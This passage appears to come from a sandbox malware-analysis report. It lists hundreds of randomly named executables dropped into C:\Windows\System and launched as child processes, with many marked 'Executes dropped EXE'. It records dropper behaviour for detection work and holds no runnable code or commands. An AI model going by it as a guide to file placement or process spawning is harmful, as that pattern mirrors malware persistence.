  PID:976
- C:\Windows\System\wfmpmtf.exe
  C:\Windows\System\wfmpmtf.exe
  2⤵
  - Executes dropped EXE
  PID:1972
- C:\Windows\System\ZwPqxgB.exe
  C:\Windows\System\ZwPqxgB.exe
  2⤵
  - Executes dropped EXE
  PID:2780
- C:\Windows\System\KSRJvCC.exe
  C:\Windows\System\KSRJvCC.exe
  2⤵
  - Executes dropped EXE
  PID:3864
- C:\Windows\System\OGUGGYK.exe
  C:\Windows\System\OGUGGYK.exe
  2⤵
  - Executes dropped EXE
  PID:2164
- C:\Windows\System\eOqzKcI.exe
  C:\Windows\System\eOqzKcI.exe
  2⤵
  - Executes dropped EXE
  PID:624
- C:\Windows\System\NyjrRqm.exe
  C:\Windows\System\NyjrRqm.exe
  2⤵
  - Executes dropped EXE
  PID:2004
- C:\Windows\System\CaZHSQa.exe
  C:\Windows\System\CaZHSQa.exe
  2⤵
  - Executes dropped EXE
  PID:644
- C:\Windows\System\OhoZpqY.exe
  C:\Windows\System\OhoZpqY.exe
  2⤵
  - Executes dropped EXE
  PID:4064
- C:\Windows\System\sIvIyPW.exe
  C:\Windows\System\sIvIyPW.exe
  2⤵
  - Executes dropped EXE
  PID:2260
- C:\Windows\System\sFucQEf.exe
  C:\Windows\System\sFucQEf.exe
  2⤵
  - Executes dropped EXE
  PID:1300
- C:\Windows\System\MDqfuUz.exe
  C:\Windows\System\MDqfuUz.exe
  2⤵
  - Executes dropped EXE
  PID:1988
- C:\Windows\System\OiEGVAB.exe
  C:\Windows\System\OiEGVAB.exe
  2⤵
  - Executes dropped EXE
  PID:3328
- C:\Windows\System\TjmAmxG.exe
  C:\Windows\System\TjmAmxG.exe
  2⤵
  - Executes dropped EXE
  PID:3780
- C:\Windows\System\NOvsqbp.exe
  C:\Windows\System\NOvsqbp.exe
  2⤵
  - Executes dropped EXE
  PID:3652
- C:\Windows\System\EaaKvRX.exe
  C:\Windows\System\EaaKvRX.exe
  2⤵
  - Executes dropped EXE
  PID:4184
- C:\Windows\System\gTpeVTd.exe
  C:\Windows\System\gTpeVTd.exe
  2⤵
  - Executes dropped EXE
  PID:4964
- C:\Windows\System\fbmBdqM.exe
  C:\Windows\System\fbmBdqM.exe
  2⤵
  - Executes dropped EXE
  PID:3904
- C:\Windows\System\uilLxqh.exe
  C:\Windows\System\uilLxqh.exe
  2⤵
  - Executes dropped EXE
  PID:4228
- C:\Windows\System\ZwWOvmh.exe
  C:\Windows\System\ZwWOvmh.exe
  2⤵
  - Executes dropped EXE
  PID:3620
- C:\Windows\System\SryHWYM.exe
  C:\Windows\System\SryHWYM.exe
  2⤵
  - Executes dropped EXE
  PID:3860
- C:\Windows\System\EIlaITh.exe
  C:\Windows\System\EIlaITh.exe
  2⤵
  - Executes dropped EXE
  PID:1636
- C:\Windows\System\YohyWpv.exe
  C:\Windows\System\YohyWpv.exe
  2⤵
  - Executes dropped EXE
  PID:4388
- C:\Windows\System\cGZsLRN.exe
  C:\Windows\System\cGZsLRN.exe
  2⤵
  - Executes dropped EXE
  PID:2700
- C:\Windows\System\Fnpeoga.exe
  C:\Windows\System\Fnpeoga.exe
  2⤵
  - Executes dropped EXE
  PID:732
- C:\Windows\System\YfdJsQI.exe
  C:\Windows\System\YfdJsQI.exe
  2⤵
  - Executes dropped EXE
  PID:1724
- C:\Windows\System\QjQIGEb.exe
  C:\Windows\System\QjQIGEb.exe
  2⤵
  - Executes dropped EXE
  PID:1748
- C:\Windows\System\ZSOjNTj.exe
  C:\Windows\System\ZSOjNTj.exe
  2⤵
  - Executes dropped EXE
  PID:1172
- C:\Windows\System\UxZzUNC.exe
  C:\Windows\System\UxZzUNC.exe
  2⤵
  - Executes dropped EXE
  PID:3204
- C:\Windows\System\BZzmhRM.exe
  C:\Windows\System\BZzmhRM.exe
  2⤵
  - Executes dropped EXE
  PID:4168
- C:\Windows\System\uFDSfNa.exe
  C:\Windows\System\uFDSfNa.exe
  2⤵
  - Executes dropped EXE
  PID:4160
- C:\Windows\System\PkGZgGU.exe
  C:\Windows\System\PkGZgGU.exe
  2⤵
  - Executes dropped EXE
  PID:2996
- C:\Windows\System\rRqmQbV.exe
  C:\Windows\System\rRqmQbV.exe
  2⤵
  - Executes dropped EXE
  PID:5016
- C:\Windows\System\KwRdrQo.exe
  C:\Windows\System\KwRdrQo.exe
  2⤵
  - Executes dropped EXE
  PID:2416
- C:\Windows\System\QSukXeJ.exe
  C:\Windows\System\QSukXeJ.exe
  2⤵
  - Executes dropped EXE
  PID:2644
- C:\Windows\System\Cdpshtw.exe
  C:\Windows\System\Cdpshtw.exe
  2⤵
  - Executes dropped EXE
  PID:2140
- C:\Windows\System\aysFoqc.exe
  C:\Windows\System\aysFoqc.exe
  2⤵
  - Executes dropped EXE
  PID:3040
- C:\Windows\System\nnjtwTQ.exe
  C:\Windows\System\nnjtwTQ.exe
  2⤵
  - Executes dropped EXE
  PID:2440
- C:\Windows\System\xshAnEd.exe
  C:\Windows\System\xshAnEd.exe
  2⤵
  - Executes dropped EXE
  PID:3676
- C:\Windows\System\IsBGYVb.exe
  C:\Windows\System\IsBGYVb.exe
  2⤵
  - Executes dropped EXE
  PID:4868
- C:\Windows\System\CNbOEea.exe
  C:\Windows\System\CNbOEea.exe
  2⤵
  - Executes dropped EXE
  PID:1912
- C:\Windows\System\qzzmnUd.exe
  C:\Windows\System\qzzmnUd.exe
  2⤵
  PID:2044
- C:\Windows\System\AsyqtsE.exe
  C:\Windows\System\AsyqtsE.exe
  2⤵
  PID:2628
- C:\Windows\System\rWePiiY.exe
  C:\Windows\System\rWePiiY.exe
  2⤵
  PID:3532
- C:\Windows\System\WCnlDyT.exe
  C:\Windows\System\WCnlDyT.exe
  2⤵
  PID:2492
- C:\Windows\System\vfNFFww.exe
  C:\Windows\System\vfNFFww.exe
  2⤵
  PID:336
- C:\Windows\System\Jvezowq.exe
  C:\Windows\System\Jvezowq.exe
  2⤵
  PID:3760
- C:\Windows\System\yFMoyLO.exe
  C:\Windows\System\yFMoyLO.exe
  2⤵
  PID:4952
- C:\Windows\System\IKkcOka.exe
  C:\Windows\System\IKkcOka.exe
  2⤵
  PID:1952
- C:\Windows\System\IVTamdV.exe
  C:\Windows\System\IVTamdV.exe
  2⤵
  PID:32
- C:\Windows\System\MwEgSAo.exe
  C:\Windows\System\MwEgSAo.exe
  2⤵
  PID:916
- C:\Windows\System\BAAiiHc.exe
  C:\Windows\System\BAAiiHc.exe
  2⤵
  PID:3076
- C:\Windows\System\zuzdFkV.exe
  C:\Windows\System\zuzdFkV.exe
  2⤵
  PID:1192
- C:\Windows\System\jaFbFqz.exe
  C:\Windows\System\jaFbFqz.exe
  2⤵
  PID:1600
- C:\Windows\System\UAvzYQY.exe
  C:\Windows\System\UAvzYQY.exe
  2⤵
  PID:1768
- C:\Windows\System\dMlhkuD.exe
  C:\Windows\System\dMlhkuD.exe
  2⤵
  PID:4200
- C:\Windows\System\LdvSlhh.exe
  C:\Windows\System\LdvSlhh.exe
  2⤵
  PID:1044
- C:\Windows\System\BQrERzL.exe
  C:\Windows\System\BQrERzL.exe
  2⤵
  PID:2160
- C:\Windows\System\aVmvqLs.exe
  C:\Windows\System\aVmvqLs.exe
  2⤵
  PID:2616
- C:\Windows\System\RFUaGTY.exe
  C:\Windows\System\RFUaGTY.exe
  2⤵
  PID:4644
- C:\Windows\System\YZsbuHm.exe
  C:\Windows\System\YZsbuHm.exe
  2⤵
  PID:5144
- C:\Windows\System\hHtbBJW.exe
  C:\Windows\System\hHtbBJW.exe
  2⤵
  PID:5176
- C:\Windows\System\lhcBAME.exe
  C:\Windows\System\lhcBAME.exe
  2⤵
  PID:5204
- C:\Windows\System\TaBTYzK.exe
  C:\Windows\System\TaBTYzK.exe
  2⤵
  PID:5236
- C:\Windows\System\XLSptyo.exe
  C:\Windows\System\XLSptyo.exe
  2⤵
  PID:5264
- C:\Windows\System\KvCpbdG.exe
  C:\Windows\System\KvCpbdG.exe
  2⤵
  PID:5292
- C:\Windows\System\rJjVxzM.exe
  C:\Windows\System\rJjVxzM.exe
  2⤵
  PID:5316
- C:\Windows\System\qelkgCX.exe
  C:\Windows\System\qelkgCX.exe
  2⤵
  PID:5344
- C:\Windows\System\uSdnCHL.exe
  C:\Windows\System\uSdnCHL.exe
  2⤵
  PID:5376
- C:\Windows\System\VUcYgTl.exe
  C:\Windows\System\VUcYgTl.exe
  2⤵
  PID:5400
- C:\Windows\System\HotmTiN.exe
  C:\Windows\System\HotmTiN.exe
  2⤵
  PID:5424
- C:\Windows\System\UpPnptd.exe
  C:\Windows\System\UpPnptd.exe
  2⤵
  PID:5456
- C:\Windows\System\ElUiuki.exe
  C:\Windows\System\ElUiuki.exe
  2⤵
  PID:5484
- C:\Windows\System\LYRakii.exe
  C:\Windows\System\LYRakii.exe
  2⤵
  PID:5520
- C:\Windows\System\bhKnBNt.exe
  C:\Windows\System\bhKnBNt.exe
  2⤵
  PID:5548
- C:\Windows\System\DaRPSDA.exe
  C:\Windows\System\DaRPSDA.exe
  2⤵
  PID:5580
- C:\Windows\System\QyNFpGV.exe
  C:\Windows\System\QyNFpGV.exe
  2⤵
  PID:5612
- C:\Windows\System\FcaQXiU.exe
  C:\Windows\System\FcaQXiU.exe
  2⤵
  PID:5636
- C:\Windows\System\cYzzlWJ.exe
  C:\Windows\System\cYzzlWJ.exe
  2⤵
  PID:5664
- C:\Windows\System\XlUSTyH.exe
  C:\Windows\System\XlUSTyH.exe
  2⤵
  PID:5692
- C:\Windows\System\ShHkAoU.exe
  C:\Windows\System\ShHkAoU.exe
  2⤵
  PID:5720
- C:\Windows\System\IzQqGrS.exe
  C:\Windows\System\IzQqGrS.exe
  2⤵
  PID:5752
- C:\Windows\System\vaoqpKI.exe
  C:\Windows\System\vaoqpKI.exe
  2⤵
  PID:5780
- C:\Windows\System\wqtloft.exe
  C:\Windows\System\wqtloft.exe
  2⤵
  PID:5804
- C:\Windows\System\RCGlCUw.exe
  C:\Windows\System\RCGlCUw.exe
  2⤵
  PID:5832
- C:\Windows\System\uWEJFRg.exe
  C:\Windows\System\uWEJFRg.exe
  2⤵
  PID:5864
- C:\Windows\System\JZdrrqJ.exe
  C:\Windows\System\JZdrrqJ.exe
  2⤵
  PID:5892
- C:\Windows\System\QzltAba.exe
  C:\Windows\System\QzltAba.exe
  2⤵
  PID:5920
- C:\Windows\System\lOxaScM.exe
  C:\Windows\System\lOxaScM.exe
  2⤵
  PID:5948
- C:\Windows\System\urWuPdv.exe
  C:\Windows\System\urWuPdv.exe
  2⤵
  PID:5976
- C:\Windows\System\bKcswjt.exe
  C:\Windows\System\bKcswjt.exe
  2⤵
  PID:6000
- C:\Windows\System\abvWwSP.exe
  C:\Windows\System\abvWwSP.exe
  2⤵
  PID:6028
- C:\Windows\System\VXHTlwf.exe
  C:\Windows\System\VXHTlwf.exe
  2⤵
  PID:6112
- C:\Windows\System\HsyKezJ.exe
  C:\Windows\System\HsyKezJ.exe
  2⤵
  PID:6136
- C:\Windows\System\aHyXGXu.exe
  C:\Windows\System\aHyXGXu.exe
  2⤵
  PID:992
- C:\Windows\System\fMIApzl.exe
  C:\Windows\System\fMIApzl.exe
  2⤵
  PID:840
- C:\Windows\System\ZTMpxFj.exe
  C:\Windows\System\ZTMpxFj.exe
  2⤵
  PID:4484
- C:\Windows\System\oNsSaeO.exe
  C:\Windows\System\oNsSaeO.exe
  2⤵
  PID:4656
- C:\Windows\System\nqdltUF.exe
  C:\Windows\System\nqdltUF.exe
  2⤵
  PID:5132
- C:\Windows\System\mndJIsZ.exe
  C:\Windows\System\mndJIsZ.exe
  2⤵
  PID:3288
- C:\Windows\System\hykHVXF.exe
  C:\Windows\System\hykHVXF.exe
  2⤵
  PID:5308
- C:\Windows\System\NslRdGT.exe
  C:\Windows\System\NslRdGT.exe
  2⤵
  PID:5368
- C:\Windows\System\HGVAJxv.exe
  C:\Windows\System\HGVAJxv.exe
  2⤵
  PID:5416
- C:\Windows\System\YBEVRij.exe
  C:\Windows\System\YBEVRij.exe
  2⤵
  PID:4412
- C:\Windows\System\pyuWaDA.exe
  C:\Windows\System\pyuWaDA.exe
  2⤵
  PID:5476
- C:\Windows\System\yddEYuN.exe
  C:\Windows\System\yddEYuN.exe
  2⤵
  PID:5512
- C:\Windows\System\dEQhNyg.exe
  C:\Windows\System\dEQhNyg.exe
  2⤵
  PID:5564
- C:\Windows\System\xtjGKNw.exe
  C:\Windows\System\xtjGKNw.exe
  2⤵
  PID:5600
- C:\Windows\System\yltrFAc.exe
  C:\Windows\System\yltrFAc.exe
  2⤵
  PID:5652
- C:\Windows\System\uNsrAky.exe
  C:\Windows\System\uNsrAky.exe
  2⤵
  PID:4352
- C:\Windows\System\WUekFnz.exe
  C:\Windows\System\WUekFnz.exe
  2⤵
  PID:5744
- C:\Windows\System\VMgAniq.exe
  C:\Windows\System\VMgAniq.exe
  2⤵
  PID:5828
- C:\Windows\System\NkPKpWP.exe
  C:\Windows\System\NkPKpWP.exe
  2⤵
  PID:3424
- C:\Windows\System\JGMdUYG.exe
  C:\Windows\System\JGMdUYG.exe
  2⤵
  PID:680
- C:\Windows\System\KWHdQyX.exe
  C:\Windows\System\KWHdQyX.exe
  2⤵
  PID:116
- C:\Windows\System\WATfReY.exe
  C:\Windows\System\WATfReY.exe
  2⤵
  PID:5996
- C:\Windows\System\FuJsNes.exe
  C:\Windows\System\FuJsNes.exe
  2⤵
  PID:3108
- C:\Windows\System\kgxqdtB.exe
  C:\Windows\System\kgxqdtB.exe
  2⤵
  PID:512
- C:\Windows\System\JGaxqHh.exe
  C:\Windows\System\JGaxqHh.exe
  2⤵
  PID:6096
- C:\Windows\System\rghYQAV.exe
  C:\Windows\System\rghYQAV.exe
  2⤵
  PID:3368
- C:\Windows\System\YuafpFc.exe
  C:\Windows\System\YuafpFc.exe
  2⤵
  PID:6020
- C:\Windows\System\FLtgGXr.exe
  C:\Windows\System\FLtgGXr.exe
  2⤵
  PID:3440
- C:\Windows\System\cDTvYOQ.exe
  C:\Windows\System\cDTvYOQ.exe
  2⤵
  PID:3024
- C:\Windows\System\BpmUdim.exe
  C:\Windows\System\BpmUdim.exe
  2⤵
  PID:1444
- C:\Windows\System\iWDSKdZ.exe
  C:\Windows\System\iWDSKdZ.exe
  2⤵
  PID:880
- C:\Windows\System\AfPiIxv.exe
  C:\Windows\System\AfPiIxv.exe
  2⤵
  PID:5280
- C:\Windows\System\yuABmxN.exe
  C:\Windows\System\yuABmxN.exe
  2⤵
  PID:5360
- C:\Windows\System\bTJjSVT.exe
  C:\Windows\System\bTJjSVT.exe
  2⤵
  PID:5576
- C:\Windows\System\PIxIlcN.exe
  C:\Windows\System\PIxIlcN.exe
  2⤵
  PID:2688
- C:\Windows\System\kxvIObk.exe
  C:\Windows\System\kxvIObk.exe
  2⤵
  PID:1744
- C:\Windows\System\uCyQQMc.exe
  C:\Windows\System\uCyQQMc.exe
  2⤵
  PID:5904
- C:\Windows\System\HyQzhIg.exe
  C:\Windows\System\HyQzhIg.exe
  2⤵
  PID:5992
- C:\Windows\System\hTGVkVL.exe
  C:\Windows\System\hTGVkVL.exe
  2⤵
  PID:4840
- C:\Windows\System\rZoMhcG.exe
  C:\Windows\System\rZoMhcG.exe
  2⤵
  PID:4736
- C:\Windows\System\YGvfKsD.exe
  C:\Windows\System\YGvfKsD.exe
  2⤵
  PID:3684
- C:\Windows\System\GZnlFtf.exe
  C:\Windows\System\GZnlFtf.exe
  2⤵
  PID:1764
- C:\Windows\System\ZXpwJgA.exe
  C:\Windows\System\ZXpwJgA.exe
  2⤵
  PID:1664
- C:\Windows\System\RyfnIjc.exe
  C:\Windows\System\RyfnIjc.exe
  2⤵
  PID:5504
- C:\Windows\System\btVmlbL.exe
  C:\Windows\System\btVmlbL.exe
  2⤵
  PID:5544
- C:\Windows\System\LZHKWsj.exe
  C:\Windows\System\LZHKWsj.exe
  2⤵
  PID:5960
- C:\Windows\System\evfDBbz.exe
  C:\Windows\System\evfDBbz.exe
  2⤵
  PID:6100
- C:\Windows\System\lItFDxC.exe
  C:\Windows\System\lItFDxC.exe
  2⤵
  PID:4172
- C:\Windows\System\bHMHxNQ.exe
  C:\Windows\System\bHMHxNQ.exe
  2⤵
  PID:3564
- C:\Windows\System\OhijoqW.exe
  C:\Windows\System\OhijoqW.exe
  2⤵
  PID:1268
- C:\Windows\System\BfwCwCT.exe
  C:\Windows\System\BfwCwCT.exe
  2⤵
  PID:6168
- C:\Windows\System\llbqRES.exe
  C:\Windows\System\llbqRES.exe
  2⤵
  PID:6184
- C:\Windows\System\OoVaEfb.exe
  C:\Windows\System\OoVaEfb.exe
  2⤵
  PID:6208
- C:\Windows\System\FAyQxtO.exe
  C:\Windows\System\FAyQxtO.exe
  2⤵
  PID:6224
- C:\Windows\System\LvFxTQC.exe
  C:\Windows\System\LvFxTQC.exe
  2⤵
  PID:6244
- C:\Windows\System\KAFUxBQ.exe
  C:\Windows\System\KAFUxBQ.exe
  2⤵
  PID:6272
- C:\Windows\System\lmJxJfh.exe
  C:\Windows\System\lmJxJfh.exe
  2⤵
  PID:6292
- C:\Windows\System\TFFTSEF.exe
  C:\Windows\System\TFFTSEF.exe
  2⤵
  PID:6312
- C:\Windows\System\LIrycno.exe
  C:\Windows\System\LIrycno.exe
  2⤵
  PID:6336
- C:\Windows\System\NdISXNF.exe
  C:\Windows\System\NdISXNF.exe
  2⤵
  PID:6416
- C:\Windows\System\LQvIRLA.exe
  C:\Windows\System\LQvIRLA.exe
  2⤵
  PID:6440
- C:\Windows\System\dzKUjpf.exe
  C:\Windows\System\dzKUjpf.exe
  2⤵
  PID:6460
- C:\Windows\System\dHXNcyM.exe
  C:\Windows\System\dHXNcyM.exe
  2⤵
  PID:6492
- C:\Windows\System\iijPrmm.exe
  C:\Windows\System\iijPrmm.exe
  2⤵
  PID:6556
- C:\Windows\System\cOmCzEg.exe
  C:\Windows\System\cOmCzEg.exe
  2⤵
  PID:6588
- C:\Windows\System\jxWFIGA.exe
  C:\Windows\System\jxWFIGA.exe
  2⤵
  PID:6608
- C:\Windows\System\dTIgdAu.exe
  C:\Windows\System\dTIgdAu.exe
  2⤵
  PID:6668
- C:\Windows\System\OYDamGM.exe
  C:\Windows\System\OYDamGM.exe
  2⤵
  PID:6692
- C:\Windows\System\AkjKPHi.exe
  C:\Windows\System\AkjKPHi.exe
  2⤵
  PID:6720
- C:\Windows\System\NoTKTBj.exe
  C:\Windows\System\NoTKTBj.exe
  2⤵
  PID:6740
- C:\Windows\System\tQMujSg.exe
  C:\Windows\System\tQMujSg.exe
  2⤵
  PID:6772
- C:\Windows\System\tFbpbTb.exe
  C:\Windows\System\tFbpbTb.exe
  2⤵
  PID:6820
- C:\Windows\System\gdWuBtk.exe
  C:\Windows\System\gdWuBtk.exe
  2⤵
  PID:6840
- C:\Windows\System\frQKoCa.exe
  C:\Windows\System\frQKoCa.exe
  2⤵
  PID:6864
- C:\Windows\System\ayruMlC.exe
  C:\Windows\System\ayruMlC.exe
  2⤵
  PID:6908
- C:\Windows\System\bFYcPjF.exe
  C:\Windows\System\bFYcPjF.exe
  2⤵
  PID:6944
- C:\Windows\System\ArggONh.exe
  C:\Windows\System\ArggONh.exe
  2⤵
  PID:6972
- C:\Windows\System\ooCyOOI.exe
  C:\Windows\System\ooCyOOI.exe
  2⤵
  PID:6992
- C:\Windows\System\OJLwBoY.exe
  C:\Windows\System\OJLwBoY.exe
  2⤵
  PID:7012
- C:\Windows\System\HnWGqpY.exe
  C:\Windows\System\HnWGqpY.exe
  2⤵
  PID:7032
- C:\Windows\System\bpADZof.exe
  C:\Windows\System\bpADZof.exe
  2⤵
  PID:7052
- C:\Windows\System\QpVDdbo.exe
  C:\Windows\System\QpVDdbo.exe
  2⤵
  PID:7084
- C:\Windows\System\nWxEcBA.exe
  C:\Windows\System\nWxEcBA.exe
  2⤵
  PID:7108
- C:\Windows\System\CoVaPWS.exe
  C:\Windows\System\CoVaPWS.exe
  2⤵
  PID:7132
- C:\Windows\System\uGTDmhb.exe
  C:\Windows\System\uGTDmhb.exe
  2⤵
  PID:7152
- C:\Windows\System\PkUAkLR.exe
  C:\Windows\System\PkUAkLR.exe
  2⤵
  PID:5988
- C:\Windows\System\frzGfLC.exe
  C:\Windows\System\frzGfLC.exe
  2⤵
  PID:5448
- C:\Windows\System\rFECNJv.exe
  C:\Windows\System\rFECNJv.exe
  2⤵
  PID:4888
- C:\Windows\System\pAIQhlV.exe
  C:\Windows\System\pAIQhlV.exe
  2⤵
  PID:6364
- C:\Windows\System\wgKuRQq.exe
  C:\Windows\System\wgKuRQq.exe
  2⤵
  PID:6404
- C:\Windows\System\Geohchw.exe
  C:\Windows\System\Geohchw.exe
  2⤵
  PID:6452
- C:\Windows\System\BAfHBLn.exe
  C:\Windows\System\BAfHBLn.exe
  2⤵
  PID:6564
- C:\Windows\System\bRvPVKV.exe
  C:\Windows\System\bRvPVKV.exe
  2⤵
  PID:6536
- C:\Windows\System\LgvOsCh.exe
  C:\Windows\System\LgvOsCh.exe
  2⤵
  PID:6680
- C:\Windows\System\EEeLwOX.exe
  C:\Windows\System\EEeLwOX.exe
  2⤵
  PID:6656
- C:\Windows\System\MXnxCnB.exe
  C:\Windows\System\MXnxCnB.exe
  2⤵
  PID:6732
- C:\Windows\System\nbRHuys.exe
  C:\Windows\System\nbRHuys.exe
  2⤵
  PID:6756
- C:\Windows\System\LtSOSyJ.exe
  C:\Windows\System\LtSOSyJ.exe
  2⤵
  PID:6832
- C:\Windows\System\iMWTFlT.exe
  C:\Windows\System\iMWTFlT.exe
  2⤵
  PID:6940
- C:\Windows\System\agMIXpF.exe
  C:\Windows\System\agMIXpF.exe
  2⤵
  PID:6988
- C:\Windows\System\DSHDUJh.exe
  C:\Windows\System\DSHDUJh.exe
  2⤵
  PID:7044
- C:\Windows\System\jVGSFPa.exe
  C:\Windows\System\jVGSFPa.exe
  2⤵
  PID:7076
- C:\Windows\System\YyUCLmN.exe
  C:\Windows\System\YyUCLmN.exe
  2⤵
  PID:7164
- C:\Windows\System\WwGxuFc.exe
  C:\Windows\System\WwGxuFc.exe
  2⤵
  PID:1436
- C:\Windows\System\CiqOimL.exe
  C:\Windows\System\CiqOimL.exe
  2⤵
  PID:6400
- C:\Windows\System\HRfduUU.exe
  C:\Windows\System\HRfduUU.exe
  2⤵
  PID:6468
- C:\Windows\System\HBGShdj.exe
  C:\Windows\System\HBGShdj.exe
  2⤵
  PID:6716
- C:\Windows\System\rIzCtIc.exe
  C:\Windows\System\rIzCtIc.exe
  2⤵
  PID:6796
- C:\Windows\System\ojSxtTi.exe
  C:\Windows\System\ojSxtTi.exe
  2⤵
  PID:7064
- C:\Windows\System\RXfOKhR.exe
  C:\Windows\System\RXfOKhR.exe
  2⤵
  PID:6160
- C:\Windows\System\cZOaYjk.exe
  C:\Windows\System\cZOaYjk.exe
  2⤵
  PID:7100
- C:\Windows\System\fXWqcZh.exe
  C:\Windows\System\fXWqcZh.exe
  2⤵
  PID:6712
- C:\Windows\System\STORrOx.exe
  C:\Windows\System\STORrOx.exe
  2⤵
  PID:6788
- C:\Windows\System\wCtnkNg.exe
  C:\Windows\System\wCtnkNg.exe
  2⤵
  PID:7172
- C:\Windows\System\ycbcCpC.exe
  C:\Windows\System\ycbcCpC.exe
  2⤵
  PID:7200
- C:\Windows\System\WXeYVQu.exe
  C:\Windows\System\WXeYVQu.exe
  2⤵
  PID:7224
- C:\Windows\System\CWBRMRb.exe
  C:\Windows\System\CWBRMRb.exe
  2⤵
  PID:7240
- C:\Windows\System\QIzDxoz.exe
  C:\Windows\System\QIzDxoz.exe
  2⤵
  PID:7260
- C:\Windows\System\ZRefOvL.exe
  C:\Windows\System\ZRefOvL.exe
  2⤵
  PID:7312
- C:\Windows\System\rJOMZSo.exe
  C:\Windows\System\rJOMZSo.exe
  2⤵
  PID:7328
- C:\Windows\System\dJuelOY.exe
  C:\Windows\System\dJuelOY.exe
  2⤵
  PID:7356
- C:\Windows\System\KYbUOQf.exe
  C:\Windows\System\KYbUOQf.exe
  2⤵
  PID:7372
- C:\Windows\System\iGkGtGw.exe
  C:\Windows\System\iGkGtGw.exe
  2⤵
  PID:7400
- C:\Windows\System\TISvhVd.exe
  C:\Windows\System\TISvhVd.exe
  2⤵
  PID:7424
- C:\Windows\System\pCUUaDf.exe
  C:\Windows\System\pCUUaDf.exe
  2⤵
  PID:7444
- C:\Windows\System\ixgnSKQ.exe
  C:\Windows\System\ixgnSKQ.exe
  2⤵
  PID:7496
- C:\Windows\System\QHqBVTi.exe
  C:\Windows\System\QHqBVTi.exe
  2⤵
  PID:7512
- C:\Windows\System\LOjYHqU.exe
  C:\Windows\System\LOjYHqU.exe
  2⤵
  PID:7564
- C:\Windows\System\zCzTSoJ.exe
  C:\Windows\System\zCzTSoJ.exe
  2⤵
  PID:7604
- C:\Windows\System\SUxlVNm.exe
  C:\Windows\System\SUxlVNm.exe
  2⤵
  PID:7628
- C:\Windows\System\qjXbEVC.exe
  C:\Windows\System\qjXbEVC.exe
  2⤵
  PID:7644
- C:\Windows\System\QbODPik.exe
  C:\Windows\System\QbODPik.exe
  2⤵
  PID:7680
- C:\Windows\System\taUkMbP.exe
  C:\Windows\System\taUkMbP.exe
  2⤵
  PID:7700
- C:\Windows\System\RREzpqR.exe
  C:\Windows\System\RREzpqR.exe
  2⤵
  PID:7716
- C:\Windows\System\MrAEstK.exe
  C:\Windows\System\MrAEstK.exe
  2⤵
  PID:7736
- C:\Windows\System\fAHCMVz.exe
  C:\Windows\System\fAHCMVz.exe
  2⤵
  PID:7784
- C:\Windows\System\ZtHOyIc.exe
  C:\Windows\System\ZtHOyIc.exe
  2⤵
  PID:7800
- C:\Windows\System\ivABglM.exe
  C:\Windows\System\ivABglM.exe
  2⤵
  PID:7832
- C:\Windows\System\BFziNdO.exe
  C:\Windows\System\BFziNdO.exe
  2⤵
  PID:7860
- C:\Windows\System\qGTqfvv.exe
  C:\Windows\System\qGTqfvv.exe
  2⤵
  PID:7880
- C:\Windows\System\wlzfhxO.exe
  C:\Windows\System\wlzfhxO.exe
  2⤵
  PID:7912
- C:\Windows\System\JNPxWMt.exe
  C:\Windows\System\JNPxWMt.exe
  2⤵
  PID:7936
- C:\Windows\System\tNyeucO.exe
  C:\Windows\System\tNyeucO.exe
  2⤵
  PID:7976
- C:\Windows\System\CcXJkEg.exe
  C:\Windows\System\CcXJkEg.exe
  2⤵
  PID:8012
- C:\Windows\System\fUGZxlm.exe
  C:\Windows\System\fUGZxlm.exe
  2⤵
  PID:8032
- C:\Windows\System\iemEFMl.exe
  C:\Windows\System\iemEFMl.exe
  2⤵
  PID:8076
- C:\Windows\System\KGRGmpK.exe
  C:\Windows\System\KGRGmpK.exe
  2⤵
  PID:8100
- C:\Windows\System\WCTpkct.exe
  C:\Windows\System\WCTpkct.exe
  2⤵
  PID:8116
- C:\Windows\System\rVTQvSj.exe
  C:\Windows\System\rVTQvSj.exe
  2⤵
  PID:8140
- C:\Windows\System\zaPaipC.exe
  C:\Windows\System\zaPaipC.exe
  2⤵
  PID:8160
- C:\Windows\System\ZxOVzfm.exe
  C:\Windows\System\ZxOVzfm.exe
  2⤵
  PID:8184
- C:\Windows\System\POWWNTN.exe
  C:\Windows\System\POWWNTN.exe
  2⤵
  PID:7212
- C:\Windows\System\hLMSSKf.exe
  C:\Windows\System\hLMSSKf.exe
  2⤵
  PID:7232
- C:\Windows\System\peveUMF.exe
  C:\Windows\System\peveUMF.exe
  2⤵
  PID:7280
- C:\Windows\System\ndwboTU.exe
  C:\Windows\System\ndwboTU.exe
  2⤵
  PID:7508
- C:\Windows\System\pNpUeus.exe
  C:\Windows\System\pNpUeus.exe
  2⤵
  PID:7540
- C:\Windows\System\wCxvdXS.exe
  C:\Windows\System\wCxvdXS.exe
  2⤵
  PID:7616
- C:\Windows\System\WKGdGfA.exe
  C:\Windows\System\WKGdGfA.exe
  2⤵
  PID:7612
- C:\Windows\System\FvaukTO.exe
  C:\Windows\System\FvaukTO.exe
  2⤵
  PID:7692
- C:\Windows\System\bNygsGk.exe
  C:\Windows\System\bNygsGk.exe
  2⤵
  PID:7712
- C:\Windows\System\rOqfbFj.exe
  C:\Windows\System\rOqfbFj.exe
  2⤵
  PID:7776
- C:\Windows\System\KMPWQjL.exe
  C:\Windows\System\KMPWQjL.exe
  2⤵
  PID:7824
- C:\Windows\System\SnWnwix.exe
  C:\Windows\System\SnWnwix.exe
  2⤵
  PID:7892
- C:\Windows\System\wtebGms.exe
  C:\Windows\System\wtebGms.exe
  2⤵
  PID:7900
- C:\Windows\System\aSbLfkm.exe
  C:\Windows\System\aSbLfkm.exe
  2⤵
  PID:7984
- C:\Windows\System\fvauWnA.exe
  C:\Windows\System\fvauWnA.exe
  2⤵
  PID:8068
- C:\Windows\System\HNrhwOW.exe
  C:\Windows\System\HNrhwOW.exe
  2⤵
  PID:8176
- C:\Windows\System\mgQtrYf.exe
  C:\Windows\System\mgQtrYf.exe
  2⤵
  PID:7196
- C:\Windows\System\reRfovu.exe
  C:\Windows\System\reRfovu.exe
  2⤵
  PID:7560
- C:\Windows\System\sjcTWjf.exe
  C:\Windows\System\sjcTWjf.exe
  2⤵
  PID:3936
- C:\Windows\System\aahAIXm.exe
  C:\Windows\System\aahAIXm.exe
  2⤵
  PID:7852
- C:\Windows\System\JgyYEPE.exe
  C:\Windows\System\JgyYEPE.exe
  2⤵
  PID:7812
- C:\Windows\System\XxuZtvC.exe
  C:\Windows\System\XxuZtvC.exe
  2⤵
  PID:8148
- C:\Windows\System\htOtZfl.exe
  C:\Windows\System\htOtZfl.exe
  2⤵
  PID:7344
